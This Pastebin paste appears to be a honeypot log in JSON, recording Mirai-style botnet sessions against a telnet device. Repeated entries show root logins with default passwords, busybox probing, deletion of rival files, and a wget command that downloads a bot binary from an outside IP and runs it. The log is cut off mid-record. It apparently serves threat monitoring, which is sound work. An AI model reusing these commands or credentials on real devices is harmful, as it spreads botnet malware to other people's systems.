API tools faq
paste
Guest User

cloudbot/AirDropBot @0xrb

a guest
Sep 30th, 2019
307
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.77 KB | None | 0 0
raw download clone embed print report
  1. {
  2. "datas": [],
  3. "inputs": {
  4. "2c08de6f5477": [
  5. {
  6. "eventid": "command.input",
  7. "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
  8. "timestamp": "2019-08-06T17:32:46.672Z"
  9. },
  10. {
  11. "eventid": "command.input",
  12. "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
  13. "timestamp": "2019-08-06T17:32:46.399Z"
  14. },
  15. {
  16. "eventid": "command.input",
  17. "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  18. "timestamp": "2019-08-06T17:32:41.469Z"
  19. },
  20. {
  21. "eventid": "command.input",
  22. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
  23. "timestamp": "2019-08-06T17:32:41.199Z"
  24. },
  25. {
  26. "eventid": "command.input",
  27. "input": "/bin/busybox ECCHI",
  28. "timestamp": "2019-08-06T17:32:40.927Z"
  29. },
  30. {
  31. "eventid": "command.input",
  32. "input": "/bin/busybox cat /bin/echo",
  33. "timestamp": "2019-08-06T17:32:40.642Z"
  34. },
  35. {
  36. "eventid": "command.input",
  37. "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  38. "timestamp": "2019-08-06T17:32:40.364Z"
  39. },
  40. {
  41. "eventid": "command.input",
  42. "input": "cd /",
  43. "timestamp": "2019-08-06T17:32:40.363Z"
  44. },
  45. {
  46. "eventid": "command.input",
  47. "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  48. "timestamp": "2019-08-06T17:32:40.361Z"
  49. },
  50. {
  51. "eventid": "command.input",
  52. "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  53. "timestamp": "2019-08-06T17:32:40.356Z"
  54. },
  55. {
  56. "eventid": "command.input",
  57. "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  58. "timestamp": "2019-08-06T17:32:40.353Z"
  59. },
  60. {
  61. "eventid": "command.input",
  62. "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  63. "timestamp": "2019-08-06T17:32:40.35Z"
  64. },
  65. {
  66. "eventid": "command.input",
  67. "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  68. "timestamp": "2019-08-06T17:32:40.347Z"
  69. },
  70. {
  71. "eventid": "command.input",
  72. "input": "rm /.t; rm /.sh; rm /.human",
  73. "timestamp": "2019-08-06T17:32:40.345Z"
  74. },
  75. {
  76. "eventid": "command.input",
  77. "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  78. "timestamp": "2019-08-06T17:32:40.34Z"
  79. },
  80. {
  81. "eventid": "command.input",
  82. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  83. "timestamp": "2019-08-06T17:32:39.689Z"
  84. },
  85. {
  86. "eventid": "command.input",
  87. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  88. "timestamp": "2019-08-06T17:32:39.684Z"
  89. },
  90. {
  91. "eventid": "command.input",
  92. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  93. "timestamp": "2019-08-06T17:32:39.677Z"
  94. },
  95. {
  96. "eventid": "command.input",
  97. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  98. "timestamp": "2019-08-06T17:32:39.671Z"
  99. },
  100. {
  101. "eventid": "command.input",
  102. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  103. "timestamp": "2019-08-06T17:32:39.461Z"
  104. }
  105. ],
  106. "33837076c101": [
  107. {
  108. "eventid": "command.input",
  109. "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
  110. "timestamp": "2019-08-06T17:34:02.945Z"
  111. },
  112. {
  113. "eventid": "command.input",
  114. "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
  115. "timestamp": "2019-08-06T17:34:02.742Z"
  116. },
  117. {
  118. "eventid": "command.input",
  119. "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  120. "timestamp": "2019-08-06T17:34:00.825Z"
  121. },
  122. {
  123. "eventid": "command.input",
  124. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
  125. "timestamp": "2019-08-06T17:34:00.622Z"
  126. },
  127. {
  128. "eventid": "command.input",
  129. "input": "/bin/busybox ECCHI",
  130. "timestamp": "2019-08-06T17:34:00.386Z"
  131. },
  132. {
  133. "eventid": "command.input",
  134. "input": "/bin/busybox cat /bin/echo",
  135. "timestamp": "2019-08-06T17:34:00.161Z"
  136. },
  137. {
  138. "eventid": "command.input",
  139. "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  140. "timestamp": "2019-08-06T17:33:59.737Z"
  141. },
  142. {
  143. "eventid": "command.input",
  144. "input": "cd /",
  145. "timestamp": "2019-08-06T17:33:59.735Z"
  146. },
  147. {
  148. "eventid": "command.input",
  149. "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  150. "timestamp": "2019-08-06T17:33:59.732Z"
  151. },
  152. {
  153. "eventid": "command.input",
  154. "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  155. "timestamp": "2019-08-06T17:33:59.725Z"
  156. },
  157. {
  158. "eventid": "command.input",
  159. "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  160. "timestamp": "2019-08-06T17:33:59.722Z"
  161. },
  162. {
  163. "eventid": "command.input",
  164. "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  165. "timestamp": "2019-08-06T17:33:59.719Z"
  166. },
  167. {
  168. "eventid": "command.input",
  169. "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  170. "timestamp": "2019-08-06T17:33:59.716Z"
  171. },
  172. {
  173. "eventid": "command.input",
  174. "input": "rm /.t; rm /.sh; rm /.human",
  175. "timestamp": "2019-08-06T17:33:59.712Z"
  176. },
  177. {
  178. "eventid": "command.input",
  179. "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  180. "timestamp": "2019-08-06T17:33:59.706Z"
  181. },
  182. {
  183. "eventid": "command.input",
  184. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  185. "timestamp": "2019-08-06T17:33:58.538Z"
  186. },
  187. {
  188. "eventid": "command.input",
  189. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  190. "timestamp": "2019-08-06T17:33:58.531Z"
  191. },
  192. {
  193. "eventid": "command.input",
  194. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  195. "timestamp": "2019-08-06T17:33:58.523Z"
  196. },
  197. {
  198. "eventid": "command.input",
  199. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  200. "timestamp": "2019-08-06T17:33:58.515Z"
  201. },
  202. {
  203. "eventid": "command.input",
  204. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  205. "timestamp": "2019-08-06T17:33:58.38Z"
  206. },
  207. {
  208. "eventid": "command.input",
  209. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
  210. "timestamp": "2019-08-06T17:33:58.365Z"
  211. },
  212. {
  213. "eventid": "command.input",
  214. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
  215. "timestamp": "2019-08-06T17:33:58.357Z"
  216. },
  217. {
  218. "eventid": "command.input",
  219. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
  220. "timestamp": "2019-08-06T17:33:58.351Z"
  221. },
  222. {
  223. "eventid": "command.input",
  224. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
  225. "timestamp": "2019-08-06T17:33:58.344Z"
  226. },
  227. {
  228. "eventid": "command.input",
  229. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
  230. "timestamp": "2019-08-06T17:33:58.337Z"
  231. },
  232. {
  233. "eventid": "command.input",
  234. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
  235. "timestamp": "2019-08-06T17:33:58.322Z"
  236. },
  237. {
  238. "eventid": "command.input",
  239. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
  240. "timestamp": "2019-08-06T17:33:58.315Z"
  241. },
  242. {
  243. "eventid": "command.input",
  244. "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
  245. "timestamp": "2019-08-06T17:33:57.634Z"
  246. },
  247. {
  248. "eventid": "command.input",
  249. "input": "/bin/busybox ps; /bin/busybox ECCHI",
  250. "timestamp": "2019-08-06T17:33:57.425Z"
  251. },
  252. {
  253. "eventid": "command.input",
  254. "input": "bash",
  255. "timestamp": "2019-08-06T17:33:56.465Z"
  256. },
  257. {
  258. "eventid": "command.input",
  259. "input": "terminal",
  260. "timestamp": "2019-08-06T17:33:56.463Z"
  261. },
  262. {
  263. "eventid": "command.input",
  264. "input": "linuxshell",
  265. "timestamp": "2019-08-06T17:33:56.461Z"
  266. },
  267. {
  268. "eventid": "command.input",
  269. "input": "sh",
  270. "timestamp": "2019-08-06T17:33:56.459Z"
  271. },
  272. {
  273. "eventid": "command.input",
  274. "input": "shell",
  275. "timestamp": "2019-08-06T17:33:56.455Z"
  276. },
  277. {
  278. "eventid": "command.input",
  279. "input": "enable",
  280. "timestamp": "2019-08-06T17:33:56.244Z"
  281. },
  282. {
  283. "eventid": "login.success",
  284. "geoip": {
  285. "city_name": "",
  286. "country_name": "Netherlands"
  287. },
  288. "password": "t0talc0ntr0l4!",
  289. "timestamp": "2019-08-06T17:33:55.628Z",
  290. "username": "root"
  291. }
  292. ],
  293. "8f610699f8d2": [
  294. {
  295. "eventid": "command.input",
  296. "input": "/bin/busybox ECCHI",
  297. "timestamp": "2019-08-06T17:33:26.74Z"
  298. },
  299. {
  300. "eventid": "command.input",
  301. "input": "/bin/busybox cat /bin/echo",
  302. "timestamp": "2019-08-06T17:33:26.437Z"
  303. },
  304. {
  305. "eventid": "command.input",
  306. "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  307. "timestamp": "2019-08-06T17:33:26.288Z"
  308. },
  309. {
  310. "eventid": "command.input",
  311. "input": "cd /",
  312. "timestamp": "2019-08-06T17:33:26.286Z"
  313. },
  314. {
  315. "eventid": "command.input",
  316. "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  317. "timestamp": "2019-08-06T17:33:26.28Z"
  318. },
  319. {
  320. "eventid": "command.input",
  321. "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  322. "timestamp": "2019-08-06T17:33:26.271Z"
  323. },
  324. {
  325. "eventid": "command.input",
  326. "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  327. "timestamp": "2019-08-06T17:33:26.266Z"
  328. },
  329. {
  330. "eventid": "command.input",
  331. "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  332. "timestamp": "2019-08-06T17:33:26.26Z"
  333. },
  334. {
  335. "eventid": "command.input",
  336. "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  337. "timestamp": "2019-08-06T17:33:26.257Z"
  338. },
  339. {
  340. "eventid": "command.input",
  341. "input": "rm /.t; rm /.sh; rm /.human",
  342. "timestamp": "2019-08-06T17:33:26.249Z"
  343. },
  344. {
  345. "eventid": "command.input",
  346. "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  347. "timestamp": "2019-08-06T17:33:26.241Z"
  348. },
  349. {
  350. "eventid": "command.input",
  351. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  352. "timestamp": "2019-08-06T17:33:25.931Z"
  353. },
  354. {
  355. "eventid": "command.input",
  356. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  357. "timestamp": "2019-08-06T17:33:25.922Z"
  358. },
  359. {
  360. "eventid": "command.input",
  361. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  362. "timestamp": "2019-08-06T17:33:25.908Z"
  363. },
  364. {
  365. "eventid": "command.input",
  366. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  367. "timestamp": "2019-08-06T17:33:25.897Z"
  368. },
  369. {
  370. "eventid": "command.input",
  371. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  372. "timestamp": "2019-08-06T17:33:25.725Z"
  373. },
  374. {
  375. "eventid": "command.input",
  376. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
  377. "timestamp": "2019-08-06T17:33:25.697Z"
  378. },
  379. {
  380. "eventid": "command.input",
  381. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
  382. "timestamp": "2019-08-06T17:33:25.686Z"
  383. },
  384. {
  385. "eventid": "command.input",
  386. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
  387. "timestamp": "2019-08-06T17:33:25.675Z"
  388. },
  389. {
  390. "eventid": "command.input",
  391. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
  392. "timestamp": "2019-08-06T17:33:25.665Z"
  393. },
  394. {
  395. "eventid": "command.input",
  396. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
  397. "timestamp": "2019-08-06T17:33:25.65Z"
  398. },
  399. {
  400. "eventid": "command.input",
  401. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
  402. "timestamp": "2019-08-06T17:33:25.629Z"
  403. },
  404. {
  405. "eventid": "command.input",
  406. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
  407. "timestamp": "2019-08-06T17:33:25.616Z"
  408. },
  409. {
  410. "eventid": "command.input",
  411. "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
  412. "timestamp": "2019-08-06T17:33:25.456Z"
  413. },
  414. {
  415. "eventid": "command.input",
  416. "input": "/bin/busybox ps; /bin/busybox ECCHI",
  417. "timestamp": "2019-08-06T17:33:25.301Z"
  418. },
  419. {
  420. "eventid": "command.input",
  421. "input": "bash",
  422. "timestamp": "2019-08-06T17:33:24.959Z"
  423. },
  424. {
  425. "eventid": "command.input",
  426. "input": "terminal",
  427. "timestamp": "2019-08-06T17:33:24.958Z"
  428. },
  429. {
  430. "eventid": "command.input",
  431. "input": "linuxshell",
  432. "timestamp": "2019-08-06T17:33:24.951Z"
  433. },
  434. {
  435. "eventid": "command.input",
  436. "input": "sh",
  437. "timestamp": "2019-08-06T17:33:24.95Z"
  438. },
  439. {
  440. "eventid": "command.input",
  441. "input": "shell",
  442. "timestamp": "2019-08-06T17:33:24.948Z"
  443. },
  444. {
  445. "eventid": "command.input",
  446. "input": "enable",
  447. "timestamp": "2019-08-06T17:33:24.779Z"
  448. },
  449. {
  450. "eventid": "login.success",
  451. "geoip": {
  452. "city_name": "",
  453. "country_name": "Netherlands"
  454. },
  455. "password": "t0talc0ntr0l4!",
  456. "timestamp": "2019-08-06T17:33:23.629Z",
  457. "username": "root"
  458. }
  459. ],
  460. "c3aee80c84a8": [
  461. {
  462. "eventid": "command.input",
  463. "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
  464. "timestamp": "2019-08-06T17:34:43.292Z"
  465. },
  466. {
  467. "eventid": "command.input",
  468. "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
  469. "timestamp": "2019-08-06T17:34:43.014Z"
  470. },
  471. {
  472. "eventid": "command.input",
  473. "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  474. "timestamp": "2019-08-06T17:33:54.963Z"
  475. },
  476. {
  477. "eventid": "command.input",
  478. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
  479. "timestamp": "2019-08-06T17:33:54.681Z"
  480. },
  481. {
  482. "eventid": "command.input",
  483. "input": "/bin/busybox ECCHI",
  484. "timestamp": "2019-08-06T17:33:53.801Z"
  485. },
  486. {
  487. "eventid": "command.input",
  488. "input": "/bin/busybox cat /bin/echo",
  489. "timestamp": "2019-08-06T17:33:52.543Z"
  490. },
  491. {
  492. "eventid": "command.input",
  493. "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  494. "timestamp": "2019-08-06T17:33:52.254Z"
  495. },
  496. {
  497. "eventid": "command.input",
  498. "input": "cd /",
  499. "timestamp": "2019-08-06T17:33:52.252Z"
  500. },
  501. {
  502. "eventid": "command.input",
  503. "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  504. "timestamp": "2019-08-06T17:33:52.25Z"
  505. },
  506. {
  507. "eventid": "command.input",
  508. "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  509. "timestamp": "2019-08-06T17:33:52.245Z"
  510. },
  511. {
  512. "eventid": "command.input",
  513. "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  514. "timestamp": "2019-08-06T17:33:52.242Z"
  515. },
  516. {
  517. "eventid": "command.input",
  518. "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  519. "timestamp": "2019-08-06T17:33:52.24Z"
  520. },
  521. {
  522. "eventid": "command.input",
  523. "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  524. "timestamp": "2019-08-06T17:33:52.237Z"
  525. },
  526. {
  527. "eventid": "command.input",
  528. "input": "rm /.t; rm /.sh; rm /.human",
  529. "timestamp": "2019-08-06T17:33:52.235Z"
  530. },
  531. {
  532. "eventid": "command.input",
  533. "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  534. "timestamp": "2019-08-06T17:33:52.23Z"
  535. },
  536. {
  537. "eventid": "command.input",
  538. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  539. "timestamp": "2019-08-06T17:33:51.627Z"
  540. },
  541. {
  542. "eventid": "command.input",
  543. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  544. "timestamp": "2019-08-06T17:33:51.622Z"
  545. },
  546. {
  547. "eventid": "command.input",
  548. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  549. "timestamp": "2019-08-06T17:33:51.615Z"
  550. },
  551. {
  552. "eventid": "command.input",
  553. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  554. "timestamp": "2019-08-06T17:33:51.609Z"
  555. },
  556. {
  557. "eventid": "command.input",
  558. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  559. "timestamp": "2019-08-06T17:33:51.367Z"
  560. },
  561. {
  562. "eventid": "command.input",
  563. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
  564. "timestamp": "2019-08-06T17:33:51.355Z"
  565. },
  566. {
  567. "eventid": "command.input",
  568. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
  569. "timestamp": "2019-08-06T17:33:51.35Z"
  570. },
  571. {
  572. "eventid": "command.input",
  573. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
  574. "timestamp": "2019-08-06T17:33:51.345Z"
  575. },
  576. {
  577. "eventid": "command.input",
  578. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
  579. "timestamp": "2019-08-06T17:33:51.34Z"
  580. },
  581. {
  582. "eventid": "command.input",
  583. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
  584. "timestamp": "2019-08-06T17:33:51.335Z"
  585. },
  586. {
  587. "eventid": "command.input",
  588. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
  589. "timestamp": "2019-08-06T17:33:51.324Z"
  590. },
  591. {
  592. "eventid": "command.input",
  593. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
  594. "timestamp": "2019-08-06T17:33:51.319Z"
  595. },
  596. {
  597. "eventid": "command.input",
  598. "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
  599. "timestamp": "2019-08-06T17:33:46.938Z"
  600. },
  601. {
  602. "eventid": "command.input",
  603. "input": "/bin/busybox ps; /bin/busybox ECCHI",
  604. "timestamp": "2019-08-06T17:33:46.039Z"
  605. },
  606. {
  607. "eventid": "command.input",
  608. "input": "bash",
  609. "timestamp": "2019-08-06T17:33:44.818Z"
  610. },
  611. {
  612. "eventid": "command.input",
  613. "input": "terminal",
  614. "timestamp": "2019-08-06T17:33:44.816Z"
  615. },
  616. {
  617. "eventid": "command.input",
  618. "input": "linuxshell",
  619. "timestamp": "2019-08-06T17:33:44.814Z"
  620. },
  621. {
  622. "eventid": "command.input",
  623. "input": "sh",
  624. "timestamp": "2019-08-06T17:33:44.813Z"
  625. },
  626. {
  627. "eventid": "command.input",
  628. "input": "shell",
  629. "timestamp": "2019-08-06T17:33:44.811Z"
  630. },
  631. {
  632. "eventid": "command.input",
  633. "input": "enable",
  634. "timestamp": "2019-08-06T17:33:44.526Z"
  635. },
  636. {
  637. "eventid": "login.success",
  638. "geoip": {
  639. "city_name": "",
  640. "country_name": "Netherlands"
  641. },
  642. "password": "vizxv",
  643. "timestamp": "2019-08-06T17:33:43.696Z",
  644. "username": "root"
  645. }
  646. ],
  647. "e551f86e07d6": [
  648. {
  649. "eventid": "command.input",
  650. "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
  651. "timestamp": "2019-08-06T17:34:33.79Z"
  652. },
  653. {
  654. "eventid": "command.input",
  655. "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
  656. "timestamp": "2019-08-06T17:34:33.55Z"
  657. },
  658. {
  659. "eventid": "command.input",
  660. "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  661. "timestamp": "2019-08-06T17:34:27.41Z"
  662. },
  663. {
  664. "eventid": "command.input",
  665. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
  666. "timestamp": "2019-08-06T17:34:26.038Z"
  667. },
  668. {
  669. "eventid": "command.input",
  670. "input": "/bin/busybox ECCHI",
  671. "timestamp": "2019-08-06T17:34:25.801Z"
  672. },
  673. {
  674. "eventid": "command.input",
  675. "input": "/bin/busybox cat /bin/echo",
  676. "timestamp": "2019-08-06T17:34:25.559Z"
  677. },
  678. {
  679. "eventid": "command.input",
  680. "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  681. "timestamp": "2019-08-06T17:34:25.124Z"
  682. },
  683. {
  684. "eventid": "command.input",
  685. "input": "cd /",
  686. "timestamp": "2019-08-06T17:34:25.122Z"
  687. },
  688. {
  689. "eventid": "command.input",
  690. "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  691. "timestamp": "2019-08-06T17:34:25.119Z"
  692. },
  693. {
  694. "eventid": "command.input",
  695. "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  696. "timestamp": "2019-08-06T17:34:25.116Z"
  697. },
  698. {
  699. "eventid": "command.input",
  700. "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  701. "timestamp": "2019-08-06T17:34:25.113Z"
  702. },
  703. {
  704. "eventid": "command.input",
  705. "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  706. "timestamp": "2019-08-06T17:34:25.111Z"
  707. },
  708. {
  709. "eventid": "command.input",
  710. "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  711. "timestamp": "2019-08-06T17:34:25.107Z"
  712. },
  713. {
  714. "eventid": "command.input",
  715. "input": "rm /.t; rm /.sh; rm /.human",
  716. "timestamp": "2019-08-06T17:34:25.104Z"
  717. },
  718. {
  719. "eventid": "command.input",
  720. "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  721. "timestamp": "2019-08-06T17:34:25.099Z"
  722. },
  723. {
  724. "eventid": "command.input",
